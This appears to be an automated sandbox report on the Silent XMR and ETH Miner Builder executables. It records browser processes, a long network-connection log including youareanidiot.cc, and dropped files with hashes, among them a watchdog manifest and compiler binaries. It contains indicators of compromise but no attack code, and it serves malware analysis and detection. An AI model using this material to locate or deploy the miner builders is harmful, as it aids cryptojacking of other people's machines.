C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x000000000000049C 0x00000000000004DC

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8824,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=8820 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=8664,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=9552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=9088,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=9820 /prefetch:10

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=8388,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=9936 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10264,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=10372 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=9916,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=8568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=9996,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=11016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=10332,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=10328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5544,i,12626101386617610507,5887832905699653442,262144 --variations-seed-version --mojo-platform-channel-handle=9964 /prefetch:14

Network

Country Destination Domain Proto
GB 2.18.66.168:443 tcp
US 13.89.179.10:443 browser.pipe.aria.microsoft.com tcp
GB 2.16.34.97:443 www.bing.com tcp
GB 142.250.200.35:80 c.pki.goog tcp
US 13.107.253.64:443 fb-unicast.msedge.net tcp
US 150.171.22.254:443 ln-ring.msedge.net tcp
US 40.112.186.181:443 2edac930e2ea4f4947825be171549364.azr.footprintdns.com tcp
GB 142.250.200.4:443 www.google.com udp
GB 216.58.204.74:443 ogads-pa.googleapis.com udp
GB 216.58.204.74:443 ogads-pa.googleapis.com tcp
GB 142.250.187.206:443 play.google.com udp
GB 142.250.187.206:443 play.google.com tcp
GB 142.250.187.206:443 play.google.com udp
GB 216.58.204.78:443 clients2.google.com udp
N/A 224.0.0.251:5353 udp
US 150.171.69.254:443 mcr-ring.msedge.net tcp
US 52.123.128.254:443 dual-s-ring.msedge.net tcp
US 172.202.64.254:443 arc-ring.msedge.net tcp
GB 2.18.66.168:443 tcp
US 13.107.3.254:443 s-ring.msedge.net tcp
US 20.140.56.69:443 fp-afd.azureedge.us tcp
US 13.89.179.10:443 browser.pipe.aria.microsoft.com tcp
GB 142.250.200.4:443 www.google.com udp
US 8.8.8.8:53 tunnel.googlezip.net udp
US 216.239.34.157:443 tunnel.googlezip.net tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
GB 216.58.204.74:443 content-autofill.googleapis.com udp
GB 142.250.187.206:443 play.google.com tcp
GB 142.250.187.206:443 play.google.com udp
GB 142.250.179.238:443 consent.google.com tcp
GB 108.138.233.77:443 clickup.com tcp
GB 108.138.233.77:443 clickup.com tcp
GB 108.138.233.77:443 clickup.com udp
US 151.101.129.229:443 cdn.jsdelivr.net tcp
US 104.18.86.42:443 cdn.cookielaw.org tcp
US 104.18.86.42:443 cdn.cookielaw.org tcp
US 151.101.129.91:443 cdn.growthbook.io tcp
US 172.64.155.119:443 clickup-privacy.my.onetrust.com tcp
GB 108.138.233.77:443 clickup.com udp
GB 18.244.179.43:443 api.clickup.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com udp
US 172.64.155.119:443 clickup-privacy.my.onetrust.com tcp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
US 13.107.246.64:443 fp-afd-nocache.azureedge.net tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 o.clarity.ms udp
US 52.152.143.207:443 o.clarity.ms tcp
US 20.189.173.11:443 browser.events.data.microsoft.com tcp
US 13.107.246.64:443 consentreceiverfd-prod.azurefd.net tcp
US 52.240.245.68:443 northcentralus-0.in.applicationinsights.azure.com tcp
US 20.189.173.11:443 browser.events.data.microsoft.com tcp
US 13.107.246.64:443 consentreceiverfd-prod.azurefd.net tcp
US 13.107.246.64:443 consentreceiverfd-prod.azurefd.net tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
GB 2.18.66.97:443 purchase.mp.microsoft.com tcp
GB 2.18.66.97:443 purchase.mp.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 apps.microsoft.com udp
US 8.8.8.8:53 apps.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 13.107.21.239:80 edge.microsoft.com tcp
US 13.107.21.239:443 edge.microsoft.com tcp
US 13.107.246.64:443 apps.microsoft.com tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 13.107.246.64:443 apps.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 13.107.246.64:443 apps.microsoft.com tcp
GB 104.86.110.107:443 www.bing.com tcp
US 13.107.21.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 204.79.197.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 images-eds-ssl.xboxlive.com udp
US 8.8.8.8:53 images-eds-ssl.xboxlive.com udp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 musicart.xboxlive.com udp
US 8.8.8.8:53 musicart.xboxlive.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
US 8.8.8.8:53 store-images.microsoft.com udp
US 8.8.8.8:53 store-images.microsoft.com udp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
US 8.8.8.8:53 www.clarity.ms udp
US 8.8.8.8:53 www.clarity.ms udp
US 13.107.246.64:443 www.clarity.ms tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 40.126.31.131:443 login.microsoftonline.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 40.126.31.67:443 login.microsoftonline.com tcp
US 13.107.21.239:443 edge.microsoft.com tcp
US 8.8.8.8:53 o.clarity.ms udp
US 8.8.8.8:53 o.clarity.ms udp
US 52.152.143.207:443 o.clarity.ms tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 13.107.246.64:443 www.clarity.ms tcp
US 8.8.8.8:53 northcentralus-0.in.applicationinsights.azure.com udp
US 8.8.8.8:53 northcentralus-0.in.applicationinsights.azure.com udp
US 52.240.245.67:443 northcentralus-0.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
JP 40.74.98.193:443 browser.events.data.microsoft.com tcp
JP 40.74.98.193:443 browser.events.data.microsoft.com tcp
JP 40.74.98.193:443 browser.events.data.microsoft.com tcp
JP 40.74.98.193:443 browser.events.data.microsoft.com tcp
GB 2.18.66.168:443 tcp
US 13.107.246.64:443 www.clarity.ms tcp
US 13.107.213.254:443 t-ring-s2.msedge.net tcp
SE 51.12.13.90:443 4c6602e41398645563de4f3ed1b4e68b.azr.footprintdns.com tcp
US 8.8.8.8:53 get.microsoft.com udp
US 8.8.8.8:53 get.microsoft.com udp
US 13.107.246.64:443 get.microsoft.com tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
GB 184.26.56.8:443 musicart.xboxlive.com tcp
GB 184.26.57.200:443 store-images.microsoft.com tcp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 sparkcdneus2.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 consentreceiverfd-prod.azurefd.net udp
US 8.8.8.8:53 consentreceiverfd-prod.azurefd.net udp
US 13.107.246.65:443 consentreceiverfd-prod.azurefd.net tcp
GB 216.58.204.67:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
GB 2.18.190.99:443 assets.msn.com tcp
GB 2.18.190.99:443 assets.msn.com tcp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
GB 2.18.66.89:443 www.bing.com tcp
GB 2.18.190.99:443 assets.msn.com tcp
IE 13.74.129.1:443 c.msn.com tcp
US 150.171.27.10:443 c.bing.com tcp
GB 104.86.110.107:443 th.bing.com tcp
GB 18.154.84.63:443 sb.scorecardresearch.com tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.18.190.99:443 assets.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 20.42.73.25:443 browser.events.data.msn.com tcp
GB 2.18.190.99:443 assets.msn.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
GB 2.18.66.89:443 www.bing.com udp
GB 104.86.110.107:443 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.msftstatic.com udp
US 8.8.8.8:53 r.msftstatic.com udp
US 204.79.197.219:443 r.msftstatic.com tcp
GB 2.18.66.48:443 r.bing.com tcp
GB 2.18.66.48:443 r.bing.com tcp
US 204.79.197.219:443 r.msftstatic.com tcp
US 8.8.8.8:53 ecn.dev.virtualearth.net udp
US 8.8.8.8:53 ecn.dev.virtualearth.net udp
GB 184.26.188.162:443 ecn.dev.virtualearth.net tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.66.171:443 th.bing.com tcp
GB 2.18.66.171:443 th.bing.com tcp
GB 104.86.110.90:443 th.bing.com tcp
GB 104.86.110.90:443 th.bing.com tcp
GB 2.18.66.171:443 th.bing.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.23:443 login.microsoftonline.com tcp
US 8.8.8.8:53 youareanidiot.cc udp
US 8.8.8.8:53 youareanidiot.cc udp
US 104.21.95.69:443 youareanidiot.cc udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 204.79.197.239:443 edge.microsoft.com tcp
IT 91.81.130.133:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 52.152.143.207:443 o.clarity.ms tcp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 o.clarity.ms udp
US 8.8.8.8:53 o.clarity.ms udp
US 52.152.143.207:443 o.clarity.ms tcp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
GB 2.18.66.75:443 www.bing.com udp
GB 2.18.66.168:443 www.bing.com udp
GB 2.18.66.168:443 www.bing.com tcp
US 52.152.143.207:443 o.clarity.ms tcp
GB 216.58.204.67:443 beacons.gcp.gvt2.com udp
US 104.21.95.69:443 youareanidiot.cc udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 52.152.143.207:443 o.clarity.ms tcp
US 52.152.143.207:443 o.clarity.ms tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 13.89.179.9:443 browser.events.data.msn.com tcp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
GB 2.18.66.74:443 r.bing.com udp
GB 2.18.66.74:443 r.bing.com tcp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
IE 13.74.129.1:443 c.msn.com tcp
GB 2.18.66.74:443 r.bing.com udp
US 150.171.28.10:443 c.bing.com tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.66.171:443 th.bing.com udp
GB 2.18.66.171:443 th.bing.com tcp
US 52.152.143.207:443 o.clarity.ms tcp
US 52.152.143.207:443 o.clarity.ms tcp
GB 2.18.190.171:443 assets.msn.com udp
GB 2.18.190.171:443 assets.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
US 150.171.28.10:443 c.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 13.107.21.239:443 edge.microsoft.com tcp
US 150.171.27.10:443 www2.bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 20.190.160.67:443 login.microsoftonline.com tcp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
GB 18.165.242.4:443 sb.scorecardresearch.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
GB 2.18.190.182:443 assets.msn.com tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 www.msn.com udp
US 8.8.8.8:53 www.msn.com udp
US 8.8.8.8:53 o.clarity.ms udp
US 8.8.8.8:53 o.clarity.ms udp
GB 2.18.190.182:443 assets.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.190.182:443 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
GB 2.18.66.51:443 th.bing.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 104.208.16.95:443 browser.events.data.msn.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
GB 2.18.66.171:443 th.bing.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
GB 2.18.66.73:443 www.bing.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
GB 2.20.12.83:443 assets.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 o.clarity.ms udp
US 8.8.8.8:53 o.clarity.ms udp
US 52.152.143.207:443 o.clarity.ms tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
GB 2.20.12.76:443 assets.msn.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe

MD5 5d7c1b7e0dfc268c1d7fd78ee0d74c71
SHA1 71f9d9872c4aec12556a885542ffdcae3f11f693
SHA256 afb19f7e92067a16800054daf6599d1a9cfcb647e322760e6c542b1cdf8ece67
SHA512 d899defc62d7378b647a6b84e2e14d872deec142947c07531954544543882b5ba41b80d08c026a49cadc1e17d9267ddaf44ab0d9ce5fdeb9c10846e4c99d3821

memory/1040-12-0x00007FFF591D3000-0x00007FFF591D5000-memory.dmp

memory/1040-13-0x0000020763490000-0x0000020765AD6000-memory.dmp

memory/1040-14-0x00007FFF591D0000-0x00007FFF59C92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe

MD5 05c9264489ab55971abfc303d990fae0
SHA1 11905331da50c52d9fd3ba33d6d090e5858b351f
SHA256 37a7697a061a29de38304a117b7540b438c2ce004d793b104aec173802d42829
SHA512 a46b3c1e4c5780e847b0e4694a10daca3c2db32a11e9811fbfdee183940d38bb718372b864d1e79f08a6a9ce67b42487fb7c65bf038fc1d4f7ce4c49b6b22754

memory/4304-27-0x000001CA83050000-0x000001CA83B2E000-memory.dmp

memory/1040-28-0x00007FFF591D3000-0x00007FFF591D5000-memory.dmp

memory/1040-29-0x00007FFF591D0000-0x00007FFF59C92000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 be4306ed23e3366c80b84db4f2f21e3b
SHA1 e8ffe0e84930f28f44e86410450c7c303da78431
SHA256 0bd4f69043a6efec682af5d1145a22127ae2d97bd66cce63e35132f85fff2778
SHA512 a18bcad9ff46d69f79a6f49af210797b582bbb97b523b56b7b6a57cc37b34c5403bbfe259ec218a11853f557801ef61a260fb4dfad95f6453ef1a798c65b1fa6

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 81c85d449a065cc8652f0db59e60966f
SHA1 210c027432679316ddb977e5b31ccf905593b0dc
SHA256 f7ec4768a6fbd2bf529dc3f1ffbadf0853fe26f43f8490b1f048a43fa1d6faf6
SHA512 6accf832944c7ba738bb6b0cd2bce4ad32292229b481827dc7e1ec5f166b9174b8983a5b039af3c790e75fac98290bbbfe049d12c846b5f65857d4456145b42d

\??\c:\Users\Admin\AppData\Local\Temp\zqlo2ilv\zqlo2ilv.cmdline

MD5 8b0c1f8e8ac1b00c385508c47e7a699b
SHA1 3c53da9dbf210bb2c6abe1a333059775c768ffdf
SHA256 804b848dbb53dad23b60c5fa8f51ae5b782b2293b1a289ec5bdca2480f910c97
SHA512 1db09b60b8da1dcec872a5ce5e01b715887ab93b1a4f8e78db7b2edd3cad13c921a19e15c7157d14a27108c4eef6ab89a5cd0dc0cf2e7654fd8bf2e41f51cd53

\??\c:\Users\Admin\AppData\Local\Temp\zqlo2ilv\zqlo2ilv.0.cs

MD5 2a9128fc6ca0c5821b88e9d951547e80
SHA1 071d1c0d802e9d39bee8a5d46ae8968d9e41cfde
SHA256 421a4e4e7ee1047ef710e26d3ea6ec20da9336d8bede9efff16dd3c8bc7c738b
SHA512 ad98b36d10faafa6d373d7a283e963f822dd5ac2db5647b65d670ba5414026fffba7011ac821c84a5b43035339d0fd5fc87e67b8381daed8b1cd0a3d463f46a9

\??\c:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-watchdog.exe.manifest

MD5 1ac9814242d34e9f458c59e745df6615
SHA1 1050554afc518cd7a90f28234586fbeb7b003de2
SHA256 df38910bf7c2e3f267c7fbcf0b0a94870ce1c0ce0e20a5c95f99411d2bfd68cc
SHA512 6b80c952e23d2096a8927fea04f024a149cbc9494c6a4e3310c2d8feb7d2e6555156f4d4d0da2866bed728f704705df71d428480b93ae1493a13e1bb6659f720

\??\c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCF08CCC66BD4841DBA5321FC7798AD82C.TMP

MD5 3a86c8caa493132da75941a83ac4ccf3
SHA1 141b422e3ddff1fc2534b1d45e58f3abbb0573b0
SHA256 5022aa7ecc430a382b811cdacbbff3ad0e7f7d7cd3705aca5464a0cdaad58011
SHA512 17360a7839c48f53df4bed8f7c1e5072283a635a354b17fe47492e6700bec8a53f6d1d7506769e6540e998b35688cc9615dea31c295f8c86da8378960f42e20c

C:\Users\Admin\AppData\Local\Temp\RES127.tmp

MD5 81d413174d3b7d565e07637c451278c9
SHA1 5024ee8973a13658ebadb1d5f9e0e048e0c0b01a
SHA256 29173e8227fc85bddf8b0c85981078eefc4581f02a1d5288c52f8d44ea5385d7
SHA512 b7786d7a4847c3da778af7de952a6fc50a74a5311f8bcd72d7d7b722538986ff4fa32807ed1fbfc3cb471e4277ce8740e6224eb09529f0e5cb5e70b0cf34e6a8

memory/4304-64-0x000001CA9ED70000-0x000001CA9ED7A000-memory.dmp

memory/4304-63-0x000001CA9EC60000-0x000001CA9EC72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

MD5 656ea3e44dd98bdddfa28689f433222e
SHA1 866428a060d29bdacbe3d46e6234f815ba276bf4
SHA256 4757d9fc9e1342cfe0387ec0477fcf1996876a266a7eae7a820144c89e4a3a8b
SHA512 fb2e478829fa6e5b99959cf6cebb937e1228a16fc13515e2267833d25096e47c8659daf154273bb84a9c717560f0a9be66de1b3bb4e41659e3c378f60df3e95d

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

MD5 43acaac9b437bd941c793ca6d9e776f7
SHA1 c7de884538ea84e50127331fde9642c4b99fa966
SHA256 27d8ea1223c1cf411773a39e8ef406d1f1d5d8956a0351ba8c74cc6c87978258
SHA512 6587acc6c03afdfb7ac5e48f01978832dac491f9cdd86d1bc68f997e85000056cbfe6c27462ec3713c4bfad139f7a4937a0258eed98cede48dddacc2f17cac2d

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\libiconv-2.dll

MD5 661d92527d19257cba74a711bd3a5666
SHA1 5c02b30aa0facdce317b981eba7a46827942e783
SHA256 5e3e889409110f7b7c2400f522b31d77b64fb3ab76ccfb9733acde34a07b7ad3
SHA512 b9a5a59a82abae523db746f48465bdadd655f6553c9dfef92a3b14fd2d561e67c90605ce01210c7476c77ed688e8ef398e25ed5f319492a79cf8284dae8398a8

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

MD5 72d8fe1f322d4eadbe4b825d0fbba8e3
SHA1 14111de0cf33c5608e2d800e96f0bdb8132b7105
SHA256 6ce68e248fb64e366aaa6a5fe34fbf530299337de34f03d51dac6b59c86b9a0d
SHA512 5f0e73be9ad6f5661b8a9a276966122c96453f73cf6f2dbbf10ac31eee8888c20217ac0b608f69e8302029352e620036804ee8733a5e5e62a104adad9245ffcb

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libcloog-isl-3.dll

MD5 301bccd39510e47ba9bcb199c15319f7
SHA1 a1c0ade259f3c504e0a3d2a06b1f23218f15f0f7
SHA256 ff6cadf145cd39b19af0b4183eb7c98bbe2e9195d03ded4117be153052ad46bc
SHA512 2d692d7581ad3dc95c6222b02628dd805748ccaf5276674d5f4633d3cfc64847a6d81b87f9c82a1f866e4a0a3b48493671db4e3caf6d400304eb547c6ead3997

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\libmpfr-1.dll

MD5 5610d32d53b668c95c69b530c2250dd7
SHA1 bd7e2953c438fd5e8d0a353f7f07685055ba80c9
SHA256 33180906b102967534f32d640c43b9e4bf7de7c4967368a76349d45e8b490b4a
SHA512 2cfd8f398b14e76ca051a17fa2366470c2aefe0c0ceebc1b609682f2decd7ee28df13b2a0419eb6258e484d6d549ddb321d11506dc884a254d227d9a439fbfd5

